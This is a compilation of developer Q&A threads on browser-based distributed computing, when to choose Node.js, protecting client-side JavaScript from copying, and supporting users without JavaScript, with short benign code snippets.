Javascript Distributed Computing [closed]

Why aren't there any Javascript distributed computing frameworks / projects? The idea seems absolutely awesome to me because:
The Client is the Browser
Iteration can be done with AJAX
Webmasters could help projects by linking the respective Javascript
Millions or even billions of users would help DC projects without even noticing
Please share your views on this subject.
EDIT: Also, what kind of problems do you think would be suitable for JSDC?
GIMPS for instance would be impossible to implement.

I think that Web Workers will soon be used to create distributed computing frameworks; there are already some early attempts at the concept. Non-blocking code execution could be done before using setTimeout, but it made little sense, since browser vendors only recently focused on optimizing their JS engines. Now we have faster code execution and new features, so running tasks unnoticed in the background as we browse the web is probably just a matter of months ;)
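In case it helps, here is roughly what that looks like; a minimal sketch, with the file name worker.js and the message format made up for illustration:

// main page: hand a chunk of work to a background thread so the UI stays responsive
var worker = new Worker('worker.js'); // 'worker.js' is a hypothetical file name
worker.onmessage = function (e) {
  console.log('work unit finished:', e.data); // e.g. POST this back to the project server
};
worker.postMessage({ start: 0, end: 1000000 }); // the work unit

// worker.js: runs off the main thread and cannot touch the DOM
onmessage = function (e) {
  var sum = 0;
  for (var i = e.data.start; i < e.data.end; i++) sum += i;
  postMessage(sum); // report the result back to the page
};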

There is something to be said for 'user rights' here. It sounds like you're describing a situation where the webmaster of Foo.com includes the script for, say, Folding@home on their site. As a result, all visitors to Foo.com have some fraction of their CPU "donated" to Folding@home until they navigate away from Foo.com. Without some sort of disclaimer or opt-in, I would consider that a form of malware and avoid visiting any site that did that.
That's not to say you couldn't build a system that asked for confirmation or permission, but there is definite potential for abuse.

I have pondered this myself in the context of item recommendation.
First, there is no problem with speed! JIT-compiled JavaScript can be as fast as unoptimized C, especially for numeric code.
The bigger problem is that running javascript in the background will slow down the browser and therefore users may not like your website because it runs slowly.
There is obviously an issue of security, how can you verify the results?
And privacy, can you ensure sensitive data isn't compromised?
On top of this, it's quite a difficult thing to do. Can the number of visits you receive justify the effort that you'll have to put into it? It would be better if you could run the code transparently on either the server or client-side. Compiling other languages to javascript can help here.
In summary, the reason that it's not widespread is because developers' time is more valuable than server time. The risk of losing user data and the inconvenience to users outweighs the potential gains.

The first thing that comes to my mind is security.
Almost all the distributed protocols I know of use encryption; that is how they mitigate security risks. And this subject is not exactly new:
http://www.igvita.com/2009/03/03/collaborative-map-reduce-in-the-browser/
Wuala is also a distributed system, implemented using a Java applet.

I know of pluraprocessing.com doing a similar thing. I'm not sure if it's exactly JavaScript, but they run Java through the browser, entirely in-memory and with strict security.
They have a grid of 50,000 computers on which they have successfully run applications, even web crawling (80legs).

I think we can verify results for certain kinds of problems.
Let's say we have n items that need sorting. We give them to worker-1, and worker-1 gives us back a result. We can verify that result in O(n) time, while producing it takes at least O(n*log(n)) time. We should also consider how large those n items are (network speed is a concern).
Another example: f(x) = 12345, and the function f is given. The goal is to find the value of x. We can test a worker's answer simply by substituting it back into f. Problems whose answers are not cheaply verifiable are difficult to hand out to someone else.
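A sketch of the two checks described above (my own illustration, not any particular framework's API):

// O(n) spot-check of a worker's 'sorted' answer; producing it costs O(n log n).
// (A full check would also confirm the result is a permutation of the input.)
function looksSorted(result) {
  for (var i = 1; i < result.length; i++) {
    if (result[i - 1] > result[i]) return false; // out of order: reject the worker
  }
  return true;
}

// For f(x) = 12345: substitute the worker's answer back into f and compare.
function verifyAnswer(f, x, expected) {
  return f(x) === expected; // cheap to check, even if x was expensive to find
}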

The whole idea of JavaScript Distributed Computing has a number of disadvantages:
single point of failure - there is no direct way to communicate between nodes
natural failure of nodes - every node works only as long as the browser does
no guarantee that a message sent will ever be received - a consequence of the natural failure of nodes
no guarantee that a message received was ever sent - because some hacker can interpose
annoying load on the client side
ethical problems
while there is only one (but very tempting) advantage:
easy and free access to millions of nodes - almost every device has a JS-supporting browser nowadays
However, the biggest problem is the correlation between scalability and annoyance. Let's say you offer some attractive web service and run computations on the client side. The more people you use for computing, the more people are annoyed; and the more people are annoyed, the fewer people use your service. Well, you can limit the annoyance (the computing), limit scalability, or try something in between.
Consider Google, for example. If Google ran computations on the client side, some people would start to use Bing. How many? That depends on the annoyance level.
The only hope for JavaScript Distributed Computing may be multimedia services. As long as they consume lots of CPU anyway, nobody will notice any additional load.

I think the no. 1 problem is JavaScript's inefficiency at computation. It just wouldn't be worth it, because an application in pure C/C++ would be 100 times faster.

I found a question similar to this a while back, so I built a thingy that does this. It uses Web Workers and fetches scripts dynamically (but no eval!). Web Workers sandbox the scripts so they cannot access the window or the DOM. You can see the code here, and the main website here.
The library has a consent popup on first load, so the user knows what's going on in the background.

Related

Confused about Node's purpose [duplicate]

I am new to this kind of stuff, but lately I've been hearing a lot about how good Node.js is. Considering how much I love working with jQuery and JavaScript in general, I can't help but wonder how to decide when to use Node.js. The web application I have in mind is something like Bitly - takes some content, archives it.
From all the homework I have been doing over the last few days, I have learned the following. Node.js:
is a command-line tool that can be run as a regular web server and lets one run JavaScript programs
utilizes the great V8 JavaScript engine
is very good when you need to do several things at the same time
is event-based so all the wonderful Ajax-like stuff can be done on the server side
lets us share code between the browser and the backend
lets us talk with MySQL
Some of the sources that I have come across are:
Diving into Node.js – Introduction and Installation
Understanding NodeJS
Node by Example (Archive.is)
Let’s Make a Web App: NodePad
Considering that Node.js can be run almost out-of-the-box on Amazon's EC2 instances, I am trying to understand what type of problems require Node.js as opposed to any of the mighty kings out there like PHP, Python and Ruby. I understand that it really depends on the expertise one has on a language, but my question falls more into the general category of: When to use a particular framework and what type of problems is it particularly suited for?
You did a great job of summarizing what's awesome about Node.js. My feeling is that Node.js is especially suited for applications where you'd like to maintain a persistent connection from the browser back to the server. Using a technique known as "long polling", you can write an application that sends updates to the user in real time. Doing long polling with most traditional frameworks, like Ruby on Rails or Django, would create immense load on the server, because each active client eats up one server process. This situation amounts to a self-inflicted tarpit attack. When you use something like Node.js, the server has no need to maintain a separate thread for each open connection.
This means you can create a browser-based chat application in Node.js that takes almost no system resources to serve a great many clients. Any time you want to do this sort of long-polling, Node.js is a great option.
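To make that concrete, here is a minimal long-polling sketch using only Node's built-in http module (the /poll and /send routes are made up for illustration):

var http = require('http');
var waiting = []; // responses parked until there is news

http.createServer(function (req, res) {
  if (req.url === '/poll') {
    waiting.push(res); // parking a client costs one small object, not one thread
  } else if (req.url === '/send') {
    waiting.forEach(function (client) { client.end('new message!'); }); // wake everyone
    waiting = [];
    res.end('delivered');
  } else {
    res.end('try /poll or /send');
  }
}).listen(8000);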
It's worth mentioning that Ruby and Python both have tools to do this sort of thing (EventMachine and Twisted, respectively), but Node.js does it exceptionally well, and from the ground up. JavaScript is exceptionally well suited to a callback-based concurrency model, and it excels here. Also, being able to serialize and deserialize with JSON, native to both the client and the server, is pretty nifty.
I look forward to reading other answers here, this is a fantastic question.
It's worth pointing out that Node.js is also great for situations in which you'll be reusing a lot of code across the client/server gap. The Meteor framework makes this really easy, and a lot of folks are suggesting this might be the future of web development. I can say from experience that it's a whole lot of fun to write code in Meteor, and a big part of this is spending less time thinking about how you're going to restructure your data, so the code that runs in the browser can easily manipulate it and pass it back.
Here's an article on Pyramid and long-polling, which turns out to be very easy to set up with a little help from gevent: TicTacToe and Long Polling with Pyramid.
I believe Node.js is best suited for real-time applications: online games, collaboration tools, chat rooms, or anything where what one user (or robot? or sensor?) does with the application needs to be seen by other users immediately, without a page refresh.
I should also mention that Socket.IO in combination with Node.js will reduce your real-time latency even further than what is possible with long polling. Socket.IO will fall back to long polling as a worst case scenario, and instead use web sockets or even Flash if they are available.
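The core of a Socket.IO chat server is only a few lines; this sketch follows the library's standard connection/emit pattern (the 'chat message' event name is arbitrary):

var io = require('socket.io')(3000); // picks WebSocket, falls back to polling automatically

io.on('connection', function (socket) {
  socket.on('chat message', function (msg) {
    io.emit('chat message', msg); // push to every connected client immediately
  });
});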
But I should also mention that just about any situation where the code might otherwise block a thread can be better addressed with Node.js. Or any situation where you need the application to be event-driven.
Also, Ryan Dahl said in a talk that I once attended that the Node.js benchmarks closely rival Nginx for regular old HTTP requests. So if we build with Node.js, we can serve our normal resources quite effectively, and when we need the event-driven stuff, it's ready to handle it.
Plus it's all JavaScript all the time. Lingua Franca on the whole stack.
Reasons to use NodeJS:
It runs Javascript, so you can use the same language on server and client, and even share some code between them (e.g. for form validation, or to render views at either end.)
The single-threaded event-driven system is fast even when handling lots of requests at once, and also simple, compared to traditional multi-threaded Java or ROR frameworks.
The ever-growing pool of packages accessible through NPM, including client- and server-side libraries/modules, as well as command-line tools for web development. Most of these are conveniently hosted on GitHub, where sometimes you can report an issue and find it fixed within hours! It's nice to have everything under one roof, with standardized issue reporting and easy forking.
It has become the de facto standard environment for running JavaScript-related tools and other web-related tools, including task runners, minifiers, beautifiers, linters, preprocessors, bundlers and analytics processors.
It seems quite suitable for prototyping, agile development and rapid product iteration.
Reasons not to use NodeJS:
It runs Javascript, which has no compile-time type checking. For large, complex safety-critical systems, or projects including collaboration between different organizations, a language which encourages contractual interfaces and provides static type checking may save you some debugging time (and explosions) in the long run. (Although the JVM is stuck with null, so please use Haskell for your nuclear reactors.)
Added to that, many of the packages in NPM are a little raw, and still under rapid development. Some libraries for older frameworks have undergone a decade of testing and bugfixing and are very stable by now. Npmjs.org has no mechanism to rate packages, which has led to a proliferation of packages doing more or less the same thing, out of which a large percentage are no longer maintained.
Nested callback hell. (Of course there are 20 different solutions to this; see the sketch just after this list.)
The ever-growing pool of packages can make one NodeJS project appear radically different from the next. There is a large diversity in implementations due to the huge number of options available (e.g. Express/Sails.js/Meteor/Derby). This can sometimes make it harder for a new developer to jump in on a Node project. Contrast that with a Rails developer joining an existing project: he should be able to get familiar with the app pretty quickly, because all Rails apps are encouraged to use a similar structure.
Dealing with files can be a bit of a pain. Things that are trivial in other languages, like reading a line from a text file, are weird enough to do with Node.js that there's a StackOverflow question on that with 80+ upvotes. There's no simple way to read one record at a time from a CSV file. Etc.
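Here is the callback-hell shape and one of those solutions side by side (getUser, getOrders and getTotals are hypothetical async functions, and the promise version assumes promise-returning variants of them):

// nested callbacks: each step indents one level deeper
getUser(id, function (err, user) {
  if (err) return done(err);
  getOrders(user, function (err, orders) {
    if (err) return done(err);
    getTotals(orders, function (err, totals) {
      if (err) return done(err);
      done(null, totals);
    });
  });
});

// the same flow with promises: flat, with one shared error handler
getUser(id)
  .then(getOrders)
  .then(getTotals)
  .then(function (totals) { /* use totals */ })
  .catch(handleError);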
I love NodeJS, it is fast and wild and fun, but I am concerned it has little interest in provable-correctness. Let's hope we can eventually merge the best of both worlds. I am eager to see what will replace Node in the future... :)
To make it short:
Node.js is well suited for applications that have a lot of concurrent connections and each request only needs very few CPU cycles, because the event loop (with all the other clients) is blocked during execution of a function.
A good article about the event loop in Node.js is Mixu's tech blog: Understanding the node.js event loop.
I have one real-world example where I have used Node.js. The company where I work had a client who wanted a simple static HTML website. The website sells one item using PayPal, and the client also wanted a counter that shows the number of items sold. The client expected a huge number of visitors to the website. I decided to make the counter using Node.js and the Express.js framework.
The Node.js application was simple: get the number of items sold from a Redis database, increase the counter when an item is sold, and serve the counter value to users via the API.
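The whole thing fits on one page; a sketch of such a counter, assuming Express and a callback-style Redis client (the route names are my guesses, not the original app's):

var express = require('express');
var redis = require('redis');

var app = express();
var db = redis.createClient();

// serve the current count to the page
app.get('/api/counter', function (req, res) {
  db.get('sold', function (err, count) {
    res.json({ sold: Number(count) || 0 });
  });
});

// called when a sale is confirmed; INCR is atomic, so concurrent sales are safe
app.post('/api/sold', function (req, res) {
  db.incr('sold', function () {
    res.sendStatus(200);
  });
});

app.listen(3000);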
Some reasons why I chose to use Node.js in this case
It is very lightweight and fast. There have been over 200,000 visits to this website in three weeks, and minimal server resources have handled it all.
The counter is really easy to make to be real time.
Node.js was easy to configure.
There are lots of modules available for free. For example, I found a Node.js module for PayPal.
In this case, Node.js was an awesome choice.
The most important reasons to start your next project using Node ...
All the coolest dudes are into it ... so it must be fun.
You can hang out at the water cooler with lots of Node adventures to brag about.
You're a penny pincher when it comes to cloud hosting costs.
Been there done that with Rails
You hate IIS deployments
Your old IT job is getting rather dull and you wish you were in a shiny new Start Up.
What to expect ...
You'll feel safe and secure with Express without all the server bloatware you never needed.
Runs like a rocket and scales well.
You dream it. You installed it. The node package repo npmjs.org is the largest ecosystem of open source libraries in the world.
Your brain will get time warped in the land of nested callbacks ...
... until you learn to keep your Promises.
Sequelize and Passport are your new API friends.
Debugging mostly async code will get umm... interesting.
Time for all Noders to master TypeScript.
Who uses it?
PayPal, Netflix, Walmart, LinkedIn, Groupon, Uber, GoDaddy, Dow Jones
Here's why they switched to Node.
There is no such thing as a silver bullet; everything comes with some cost. It is like eating oily food: you will compromise your health, yet healthy food does not come with spices the way oily food does. It is an individual choice whether they want health or spice in their food.
In the same way, Node.js is meant to be used in specific scenarios. If your app does not fit those scenarios, you should not consider it for your app development. I am just putting down my thoughts on the same:
When to use Node.JS
If your server-side code requires very few CPU cycles. In other words, you are doing non-blocking operations and do not have heavy algorithms/jobs that consume lots of CPU cycles.
If you come from a JavaScript background and are comfortable writing single-threaded code, just like client-side JS.
When NOT to use Node.JS
When serving a request depends on a heavy, CPU-consuming algorithm/job.
Scalability Consideration with Node.JS
Node.js itself does not utilize all the cores of the underlying system; it is single-threaded by default. You have to write the logic yourself to take advantage of a multi-core processor, for example with the built-in cluster module, as sketched below.
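A minimal sketch of that pattern using the built-in cluster module:

var cluster = require('cluster');
var http = require('http');
var os = require('os');

if (cluster.isMaster) {
  // fork one worker per core; incoming connections are spread across them
  os.cpus().forEach(function () { cluster.fork(); });
} else {
  http.createServer(function (req, res) {
    res.end('handled by pid ' + process.pid);
  }).listen(8000);
}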
Node.JS Alternatives
There are other options to use in place of Node.js. Vert.x seems to be pretty promising and has lots of additional features, such as being polyglot and having better scalability considerations.
Another great thing that I think no one has mentioned about Node.js is the amazing community, the package management system (npm) and the number of modules that exist, which you can pull in by simply listing them in your package.json file.
My piece: Node.js is great for making real-time systems like analytics, chat apps, APIs, ad servers, etc. Hell, I made my first chat app using Node.js and Socket.IO in under 2 hours, and that during exam week!
Edit
It's been several years since I started using Node.js, and I have used it to build many different things, including static file servers, simple analytics, chat apps and much more.
This is my take on when to use nodejs
When to use
When making systems that put an emphasis on concurrency and speed.
Socket-only servers, like chat apps, IRC apps, etc.
Social networks that put an emphasis on real-time resources like geolocation, video streams, audio streams, etc.
Handling small chunks of data really fast, like an analytics webapp.
Exposing a REST-only API.
When not to use
It's a very versatile web server, so you can use it wherever you want, but probably not in these places:
Simple blogs and static sites.
Just as a static file server.
Keep in mind that I am just nitpicking. For static file servers, Apache is better, mainly because it is widely available. The Node.js community has grown larger and more mature over the years, and it is safe to say Node.js can be used just about everywhere if you have your own choice of hosting.
It can be used where
Applications that are highly event-driven and heavily I/O-bound
Applications handling a large number of connections to other systems
Real-time applications (Node.js was designed from the ground up for real time and to be easy to use)
Applications that juggle scads of information streaming to and from other sources
High-traffic, scalable applications
Mobile apps that have to talk to platform APIs and databases without doing a lot of data analytics
Building out networked applications
Applications that need to talk to the back end very often
On the mobile front, prime-time companies have relied on Node.js for their mobile solutions. Check out why:
LinkedIn is a prominent user. Their entire mobile stack is built on Node.js. They went from running 15 servers with 15 instances on each physical machine to just 4 instances that can handle double the traffic!
eBay launched ql.io, a web query language for HTTP APIs, which uses Node.js as the runtime stack. They were able to tune a regular developer-quality Ubuntu workstation to handle more than 120,000 active connections per node.js process, with each connection consuming about 2kB memory!
Walmart re-engineered its mobile app to use Node.js and pushed its JavaScript processing to the server.
Read more at: http://www.pixelatingbits.com/a-closer-look-at-mobile-app-development-with-node-js/
Node is best for concurrent request handling:
So, let's start with a story. For the last 2 years I have been working with JavaScript, developing web front ends, and I am enjoying it. The back-end guys provide us with APIs written in Java or Python (we don't care); we simply write an AJAX call, get our data and, guess what, we are done! But in reality it is not that easy: if the data we are getting is not correct, or there is some server error, we are stuck, and we have to contact our back-end guys over mail or chat (sometimes on WhatsApp too :).) This is not cool. What if we wrote our APIs in JavaScript and called those APIs from our front end? Yes, that's pretty cool, because if we face any problem in the API we can look into it ourselves. Guess what, you can do this now! How? Node is there for you.
OK, agreed that you can write your API in JavaScript, but what if I am fine with the above problem? Do you have any other reason to use Node for a REST API?
So here is where the magic begins. Yes, I do have other reasons to use Node for our APIs.
Let's go back to our traditional REST API system, which is based on either blocking operations or threading. Suppose two concurrent requests occur (r1 and r2), each of which requires a database operation. In a traditional system, this is what happens:
1. Waiting way: our server starts serving the r1 request and waits for the query response. After the completion of r1, the server starts to serve r2 and handles it the same way. Waiting is not a good idea, because we don't have that much time.
2. Threading way: our server creates two threads, one for each of the requests r1 and r2, and serves them after querying the database, which is fast. But it is memory-consuming: you can see we started two threads, and the problems increase when both requests query the same data, because then you have to deal with deadlock-like issues. It's better than the waiting way, but issues remain.
Now here is how Node does it:
3. Node way: when the same concurrent requests come to Node, it registers an event with its callback and moves ahead; it does not wait for the query response for a particular request. So when the r1 request comes in, Node's event loop (yes, there is an event loop in Node that serves this purpose) registers an event with its callback function and moves ahead to serve the r2 request, similarly registering its event with its callback. Whenever a query finishes, it triggers its corresponding event and executes that callback to completion without being interrupted.
So no waiting, no threading, no memory consumption: yes, this is the Node way of serving a REST API.
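In code, the Node way from point 3 looks roughly like this (db.query stands in for any non-blocking database driver call; it is not a real built-in):

var http = require('http');

http.createServer(function (req, res) {
  // register the callback and return to the event loop immediately
  db.query('SELECT ...', function (err, rows) {
    // runs later, when the database answers; other requests (r2, r3, ...)
    // were served in the meantime
    res.end(JSON.stringify(rows));
  });
}).listen(8000);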
One more reason for me to choose Node.js for a new project is:
being able to do pure cloud-based development.
I have used the Cloud9 IDE for a while and now I can't imagine working without it; it covers the whole development lifecycle. All you need is a browser, and you can code anytime, anywhere, on any device. You don't need to check in code on one computer (like at home), then check it out on another computer (like at the workplace).
Of course, there may be cloud-based IDEs for other languages or platforms (Cloud9 IDE is adding support for other languages as well), but using Cloud9 to do Node.js development has been a really great experience for me.
One more thing Node provides is the ability to create multiple V8 instances on the fly using Node's child processes (childProcess.fork(), each requiring about 10 MB of memory, per the docs), without affecting the main process running the server. So offloading a background job that requires a huge server load becomes child's play, and we can easily kill those processes as and when needed.
I've been using Node a lot, and most of the apps we build require many server connections at the same time, and thus heavy network traffic. Frameworks like Express.js and the newer Koa.js (which removed callback hell) have made working with Node even easier.
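A sketch of that offloading pattern (heavy-job.js is a made-up file name):

// parent.js: push a heavy job into a separate V8 instance
var fork = require('child_process').fork;
var job = fork('./heavy-job.js');

job.on('message', function (result) {
  console.log('background job finished:', result);
  job.kill(); // dispose of the child whenever we like
});

job.send({ size: 1e7 });

// heavy-job.js: runs in its own process, so the server's event loop stays free
process.on('message', function (msg) {
  var total = 0;
  for (var i = 0; i < msg.size; i++) total += i;
  process.send(total);
});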
Donning asbestos longjohns...
Yesterday my title with Packt Publications, Reactive Programming with JavaScript, went live. It isn't really a Node.js-centric title; the early chapters are intended to cover theory, and the later, code-heavy chapters cover practice. Because I didn't really think it would be appropriate to fail to give readers a web server, Node.js seemed by far the obvious choice. The case was closed before it was even opened.
I could have given a very rosy view of my experience with Node.js. Instead I was honest about good points and bad points I encountered.
Let me include a few quotes that are relevant here:
Warning: Node.js and its ecosystem are hot--hot enough to burn you badly!
When I was a teacher’s assistant in math, one of the non-obvious suggestions I was told was not to tell a student that something was “easy.” The reason was somewhat obvious in retrospect: if you tell people something is easy, someone who doesn’t see a solution may end up feeling (even more) stupid, because not only do they not get how to solve the problem, but the problem they are too stupid to understand is an easy one!
There are gotchas that don't just annoy people coming from Python / Django, which immediately reloads the source if you change anything. With Node.js, the default behavior is that if you make one change, the old version continues to be active until the end of time or until you manually stop and restart the server. This inappropriate behavior doesn't just annoy Pythonistas; it also irritates native Node.js users, who provide various workarounds. The StackOverflow question "Auto-reload of files in Node.js" has, at the time of this writing, over 200 upvotes and 19 answers; an edit directs the user to a nanny script, node-supervisor, with a homepage at http://tinyurl.com/reactjs-node-supervisor. This problem affords new users a great opportunity to feel stupid, because they thought they had fixed the problem, but the old, buggy behavior is completely unchanged. And it is easy to forget to bounce the server; I have done so multiple times. And the message I would like to give is, "No, you're not stupid because this behavior of Node.js bit your back; it's just that the designers of Node.js saw no reason to provide appropriate behavior here. Do try to cope with it, perhaps taking a little help from node-supervisor or another solution, but please don't walk away feeling that you're stupid. You're not the one with the problem; the problem is in Node.js's default behavior."
This section, after some debate, was left in, precisely because I don't want to give an impression of “It’s easy.” I cut my hands repeatedly while getting things to work, and I don’t want to smooth over difficulties and set you up to believe that getting Node.js and its ecosystem to function well is a straightforward matter and if it’s not straightforward for you too, you don’t know what you’re doing. If you don’t run into obnoxious difficulties using Node.js, that’s wonderful. If you do, I would hope that you don’t walk away feeling, “I’m stupid—there must be something wrong with me.” You’re not stupid if you experience nasty surprises dealing with Node.js. It’s not you! It’s Node.js and its ecosystem!
The Appendix, which I did not really want after the rising crescendo in the last chapters and the conclusion, talks about what I was able to find in the ecosystem, and provided a workaround for moronic literalism:
Another database that seemed like a perfect fit, and may yet be redeemable, is a server-side implementation of the HTML5 key-value store. This approach has the cardinal advantage of an API that most good front-end developers understand well enough. For that matter, it’s also an API that most not-so-good front-end developers understand well enough. But with the node-localstorage package, while dictionary-syntax access is not offered (you want to use localStorage.setItem(key, value) or localStorage.getItem(key), not localStorage[key]), the full localStorage semantics are implemented, including a default 5MB quota—WHY? Do server-side JavaScript developers need to be protected from themselves?
For client-side database capabilities, a 5MB quota per website is really a generous and useful amount of breathing room to let developers work with it. You could set a much lower quota and still offer developers an immeasurable improvement over limping along with cookie management. A 5MB limit doesn’t lend itself very quickly to Big Data client-side processing, but there is a really quite generous allowance that resourceful developers can use to do a lot. But on the other hand, 5MB is not a particularly large portion of most disks purchased any time recently, meaning that if you and a website disagree about what is reasonable use of disk space, or some site is simply hoggish, it does not really cost you much and you are in no danger of a swamped hard drive unless your hard drive was already too full. Maybe we would be better off if the balance were a little less or a little more, but overall it’s a decent solution to address the intrinsic tension for a client-side context.
However, it might gently be pointed out that when you are the one writing code for your server, you don’t need any additional protection from making your database more than a tolerable 5MB in size. Most developers will neither need nor want tools acting as a nanny and protecting them from storing more than 5MB of server-side data. And the 5MB quota that is a golden balancing act on the client-side is rather a bit silly on a Node.js server. (And, for a database for multiple users such as is covered in this Appendix, it might be pointed out, slightly painfully, that that’s not 5MB per user account unless you create a separate database on disk for each user account; that’s 5MB shared between all user accounts together. That could get painful if you go viral!) The documentation states that the quota is customizable, but an email a week ago to the developer asking how to change the quota is unanswered, as was the StackOverflow question asking the same. The only answer I have been able to find is in the Github CoffeeScript source, where it is listed as an optional second integer argument to a constructor. So that’s easy enough, and you could specify a quota equal to a disk or partition size. But besides porting a feature that does not make sense, the tool’s author has failed completely to follow a very standard convention of interpreting 0 as meaning “unlimited” for a variable or function where an integer is to specify a maximum limit for some resource use. The best thing to do with this misfeature is probably to specify that the quota is Infinity:
if (typeof localStorage === 'undefined' || localStorage === null) {
  var LocalStorage = require('node-localstorage').LocalStorage;
  localStorage = new LocalStorage(__dirname + '/localStorage', Infinity);
}
Swapping two comments in order:
People needlessly shot themselves in the foot constantly using JavaScript as a whole, and part of JavaScript being made a respectable language was Douglas Crockford saying, in essence, "JavaScript as a language has some really good parts and some really bad parts. Here are the good parts. Just forget that anything else is there." Perhaps the hot Node.js ecosystem will grow its own "Douglas Crockford," who will say, "The Node.js ecosystem is a coding Wild West, but there are some real gems to be found. Here's a roadmap. Here are the areas to avoid at almost any cost. Here are the areas with some of the richest paydirt to be found in ANY language or environment."
Perhaps someone else can take those words as a challenge, and follow Crockford’s lead and write up “the good parts” and / or “the better parts” for Node.js and its ecosystem. I’d buy a copy!
And given the degree of enthusiasm and sheer work-hours on all projects, it may be warranted in a year, or two, or three, to sharply temper any remarks about an immature ecosystem made at the time of this writing. It really may make sense in five years to say, “The 2015 Node.js ecosystem had several minefields. The 2020 Node.js ecosystem has multiple paradises.”
If your application mainly tethers together web APIs or other I/O channels, give or take a user interface, Node.js may be a fair pick for you, especially if you want to squeeze out the most scalability or if your main language in life is JavaScript (or JavaScript transpilers of sorts). If you build microservices, Node.js is also okay. Node.js is also suitable for any project that is small or simple.
Its main selling point is that it lets front-enders take responsibility for back-end stuff rather than the typical divide. Another justifiable selling point is if your workforce is JavaScript-oriented to begin with.
Beyond a certain point, however, you cannot scale your code without terrible hacks for forcing modularity, readability and flow control. Some people like those hacks, though; especially coming from an event-driven JavaScript background, they seem familiar or forgivable.
In particular, when your application needs to perform synchronous flows, you start bleeding over half-baked solutions that slow you down considerably in terms of your development process. If you have computation-intensive parts in your application, tread with caution when picking (only) Node.js. Maybe http://koajs.com/ or other novelties alleviate those originally thorny aspects, compared to when I originally used Node.js or wrote this.
I can share a few points on where and why to use Node.js.
For real-time applications like chat or collaborative editing, we'd better go with Node.js, as it is event-based: the server fires events and data at clients.
It is simple and easy to understand, as it is JavaScript-based and most people have an idea of JavaScript.
Most current web applications are moving towards Angular.js and Backbone; with Node it is easy to interact with client-side code, as both sides use JSON data.
Lots of plugins are available.
Drawbacks:
Node supports most databases, but the best fit is MongoDB, which doesn't support complex joins and the like.
Errors: developers should handle each and every exception; otherwise, if an error occurs, the application stops working, and we have to go and start it again manually or with an automation tool (one last-resort hook is sketched below).
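For that second drawback, Node does offer a last-resort hook, though the usual advice is still to exit and let a supervisor (forever, pm2, systemd and the like) restart the process; a sketch:

process.on('uncaughtException', function (err) {
  console.error('unhandled error:', err.stack); // log it instead of dying silently
  process.exit(1); // state may be corrupt, so exit and let the supervisor restart us
});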
Conclusion:
Node.js is best used for simple, real-time applications. If you have very big business logic and complex functionality, you'd better not use Node.js.
If you want to build an application with chat or any collaborative functionality, Node can be used for those specific parts, and the rest should stay with whatever technology is convenient for you.
Node is great for quick prototypes but I'd never use it again for anything complex.
I spent 20 years developing a relationship with a compiler and I sure miss it.
Node is especially painful for maintaining code that you haven't visited for a while. Type info and compile-time error detection are GOOD THINGS. Why throw all that out? For what? And dang, when something does go south, the stack traces are quite often completely useless.

How do Gmail, Twitter, Grooveshark, and those web apps built with a pure JavaScript UI prevent people from stealing their code? [closed]

I am currently considering building a single-page web app using a RESTful API, putting the entire UI logic in JavaScript on the client side. This design concept has been adopted by Twitter and several other web apps.
However, I am wondering how to prevent users from stealing my JavaScript code, since my app logic is all stored in JavaScript. Do products like Gmail, Grooveshark, or Twitter not care about this issue? Do they not care that people could just replicate their app by copying the JavaScript? If so, doesn't it bring a lot of risk to the business?
I hope someone can answer my question, as I am trying to figure out how other people are building their apps, and whether anyone shares this concern.
On a purely technical level, you can't. Any JavaScript code readable by a browser can be read by a developer using the very same user agent. In fact, there are browser addons which allow the user to read the JavaScript behind, or linked by, any web page.
Having said that, you can make hijacking your JavaScript code harder by using minification (e.g.: http://code.google.com/p/minify/).
As previously stated, there is no way to prevent "code stealing". Just remember we are in a world where code isn't valued as much anymore. It's so easy to build an application that what really matters is the branding around it.
Anyone can build a Facebook of their own, but the real value is the number of users on Facebook. I don't believe companies try to protect their code anymore; in fact they make it easy for you to get it, via GitHub or the like. Talking about their products and the way they are made is more beneficial to them than you might think.
Just take a look at Twitter Bootstrap. The investment they put into that code is well rewarded by all the people building apps on their technology. It reinforces the technical value of their systems.
You can minify/obfuscate your JavaScript code, making it essentially unreadable.
For example: http://code.google.com/p/minify/
or check this question:
How can I obfuscate (protect) JavaScript?
If your business requirements state that your source must remain a closely guarded secret and you are attempting to make a single webpage that contains all your business logic you have a conflicting design.
No matter how much obfuscation or minification you perform on your client-side code, there is going to be a way (simple browser plugins like Firebug can do this) to deobfuscate your code.
There is no such thing as "security through obscurity".
Take a look at:
http://a0.twimg.com/b/1/bundle/phoenix-core-en-201112200936.js
http://a2.twimg.com/b/1/bundle/phoenix-more-en-201112200936.js
And consider how hard it is to extract useful information from the code.
This is some of the JavaScript code that your browser downloads when you visit a page on Twitter. This code has been minified (to make it more efficient to move around the network) and obfuscated (to make it harder to read). These techniques make it much harder for the casual user to re-use or reverse-engineer your code. Tools for doing this are widespread and include Google's Closure Compiler, Yahoo's YUI Compressor, and others.
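For illustration, here is what that does to a small hand-written function (my own example, not Twitter's actual code):

// before: readable source
function calculateTotal(prices, taxRate) {
  var total = 0;
  for (var i = 0; i < prices.length; i++) {
    total += prices[i];
  }
  return total * (1 + taxRate);
}

// after minification and name mangling: same behavior, far less legible
function c(a,b){for(var t=0,i=0;i<a.length;i++)t+=a[i];return t*(1+b)}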
No such tool is perfect, however. They won't stop a determined hacker -- of course, a determined hacker could probably just reproduce the functionality, which leads to your best defense, IMHO: your copyright.
When you create software, that software is protected by copyright law, in much the same way as other works are (see Software Copyright). If you create a hot new javascript app, and someone rips the code and puts it in their app, you have grounds for legal action. However, the law doesn't just prevent them from using it exactly "as is". From Wikipedia:
There is a certain amount of work that goes into making copyright successful, and just as with other works, copyright for computer programs prohibits not only literal copying, but also copying of "nonliteral elements", such as program structure and design.
This can be very valuable protection.

Should your website work without JavaScript [duplicate]

We're developing a web application that is going to be used by external clients on the internet. The browsers we're required to support are IE7+ and FF3+. One of our requirements is that we use AJAX wherever possible. Given this requirement I feel that we shouldn't have to cater for users without javascript enabled, however others in the team disagree.
My question is, if, in this day and age, we should be required to cater for users that don't have javascript enabled?
Coming back more than 10 years later, it's worth noting my first two bullet points have faded to insignificance, and the situation has improved marginally for the third (accessible browsers do better) and fourth (Google runs more js) as well.
There are a lot more users on the public internet who may have trouble with javascript than you might think:
Mobile browsers (smartphones) often have very poor or buggy javascript implementations. These will often show up in statistics on the side of those that do support javascript, even though they in effect don't. This is getting better, but there are still lots of people stuck with old or slow android phones with very old versions of Chrome or bad webkit clones.
Things like NoScript are becoming more popular, so you should at least have a nice initial page for those users.
If your customer is in any way part of the U.S. Government, you are legally required to support screen readers, which typically don't do JavaScript, or don't do it well.
